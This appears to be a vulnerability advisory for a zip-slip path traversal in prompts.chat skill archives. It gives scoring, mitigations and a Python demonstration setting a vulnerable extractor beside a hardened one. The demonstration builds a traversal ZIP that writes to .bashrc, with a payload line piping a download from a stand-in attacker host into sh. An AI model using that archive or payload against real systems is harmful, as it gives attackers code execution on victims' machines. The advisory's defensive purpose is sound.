CVE-2026-22661
Published: 03 April 2026
Summary
CVE-2026-22661 is a high-severity Path Traversal (CWE-22) vulnerability in Fka Prompts.Chat (the prompts.chat project). Its CVSS base score is 8.1 (High).
Operationally, exploitation maps to the MITRE ATT&CK technique User Execution: Malicious File (T1204.002). The vulnerability ranks at the 24.5th percentile by exploit likelihood (below the median), is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly prevents path traversal by validating every entry name in a ZIP archive during extraction, rejecting ../ sequences (and, as a practical matter, absolute entry names) before anything is written outside the target directory.
- SI-2 (Flaw Remediation): remediates the specific flaw by requiring a timely update to commit 0f8d4c3 or later, which adds filename sanitization.
- SI-3 (Malicious Code Protection): scans ZIP archives and extracted files for malicious content, mitigating payloads that overwrite shell initialization files to gain code execution.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
A malicious ZIP delivered as a skill file relies on the victim downloading and extracting it (User Execution: Malicious File, T1204.002); the traversal then writes to shell initialization files such as .bashrc, so the payload runs at the next shell start (Event Triggered Execution: Unix Shell Configuration Modification, T1546.004).
NVD Description
prompts.chat prior to commit 0f8d4c3 contains a path traversal vulnerability in skill file handling that allows attackers to write arbitrary files to the client system by crafting malicious ZIP archives with unsanitized filenames containing path traversal sequences. Attackers can exploit missing server-side filename validation to inject path traversal sequences ../ into skill file archives, which when extracted by vulnerable tools write files outside the intended directory and overwrite shell initialization files to achieve code execution.
Deeper analysis
CVE-2026-22661 is a path traversal vulnerability (CWE-22) in the skill file handling of prompts.chat prior to commit 0f8d4c3. Filenames inside skill ZIP archives are not validated server-side, so an attacker can embed traversal sequences such as ../ in entry names. When a vulnerable client-side tool extracts such an archive, it joins each entry name onto the extraction directory without checking where the result lands, so files are written outside the intended directory: an arbitrary file write on the victim's system (the pattern commonly called "zip slip"). The CVSS v3.1 base score is 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N): reachable over the network, no privileges required, user interaction required, high confidentiality and integrity impact, no availability impact.
Exploitation needs no authentication: the attacker crafts a ZIP that looks like a legitimate skill file and gets the victim to download and extract it. At that point the traversal sequences escape the extraction directory and the attacker chooses the destination, for example a shell initialization file such as .bashrc or .profile. Overwriting one of those files with attacker-supplied commands yields code execution the next time the user starts a shell.
Mitigation is to update prompts.chat to commit 0f8d4c3 or later; the fix is in the project's GitHub commit (0f8d4c381abd7b2d7478c9fdee9522149c2d65e5) and pull request #1101, which add filename sanitization. Additional guidance is available in the VulnCheck advisory on prompts.chat path traversal via skill file handling. When reviewing this fix or any similar extractor, the check that matters is on the resolved path: reject absolute entry names and any entry whose canonical destination is not inside the extraction root, rather than only searching the name for the literal string ../ (an absolute name, or a path that normalizes past the root in some other way, never needs that substring).
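A worked example of the pattern described above, added here; it is not code from prompts.chat, and the archive, entry names and payload are constructed for the demonstration. It is written in Python for its built-in zipfile module, not because the project uses Python. naive_extract joins entry names straight onto the destination (the CWE-22 bug), safe_target is the SI-10 style check that resolves each entry and refuses anything outside the extraction root, and unsafe_entries is the pre-extraction scan that flags offending entries. Everything runs inside a temporary directory, so the escaped .bashrc lands in a throwaway tree, never in the real home directory.

```python
"""Zip slip in a skill archive: the vulnerable extractor beside a hardened one.

Added example, not prompts.chat code. The archive, entry names and payload are
constructed here; the flaw is the generic CWE-22 pattern the advisory describes.
"""
import io
import os
import tempfile
import zipfile
from typing import Optional

# Constructed payload: the kind of line an attacker wants in ~/.bashrc.
PAYLOAD = b"curl -s http://attacker.invalid/run | sh\n"


def build_malicious_skill_zip() -> bytes:
    """A 'skill' archive with one benign entry and one that climbs two levels up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("my-skill/SKILL.md", "# Harmless-looking skill\n")
        zf.writestr("../../.bashrc", PAYLOAD)  # the zip-slip entry
    return buf.getvalue()


def naive_extract(zip_bytes: bytes, dest: str) -> list:
    """Vulnerable pattern: trust the entry name and join it onto dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # no check of where this lands
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(os.path.abspath(target))
    return written


def safe_target(dest: str, name: str) -> Optional[str]:
    """Resolved path an entry may be written to, or None if it must be rejected.

    Rejects absolute names and drive letters outright, then compares the
    canonical destination against the canonical root, which catches '..'
    in any form and symlinks already present under dest.
    """
    if os.path.isabs(name) or os.path.splitdrive(name)[0]:
        return None
    root = os.path.realpath(dest)
    candidate = os.path.realpath(os.path.join(root, name))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def unsafe_entries(zip_bytes: bytes, dest: str) -> list:
    """Audit pass: entry names that would escape dest (run before extracting)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if safe_target(dest, n) is None]


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Hardened extractor: refuse the whole archive if any entry escapes."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError(f"path traversal in archive entries: {bad}")
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = safe_target(dest, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as out:
                out.write(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors in a throwaway tree; nothing outside it is touched."""
    archive = build_malicious_skill_zip()
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.realpath(tmp)  # stands in for the victim's $HOME
        dest = os.path.join(home, "skills", "incoming")
        os.makedirs(dest)
        naive = naive_extract(archive, dest)
        escaped = [p for p in naive if not p.startswith(dest + os.sep)]
        try:
            safe_extract(archive, dest)
            rejected = False
        except ValueError:
            rejected = True
        return {
            "escaped": [os.path.relpath(p, home) for p in escaped],
            "bashrc_written": os.path.isfile(os.path.join(home, ".bashrc")),
            "flagged": unsafe_entries(archive, dest),
            "safe_extract_rejected": rejected,
        }


if __name__ == "__main__":
    print(demo())
```

Running the file prints the dictionary returned by demo(): naive extraction reports one path that escaped the destination (.bashrc, two levels above it), while the hardened extractor refuses the entire archive. Rejecting the whole archive rather than skipping the bad entries is deliberate; a partially extracted skill from an archive that tried to escape is still untrusted input.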
Details
- CWE(s)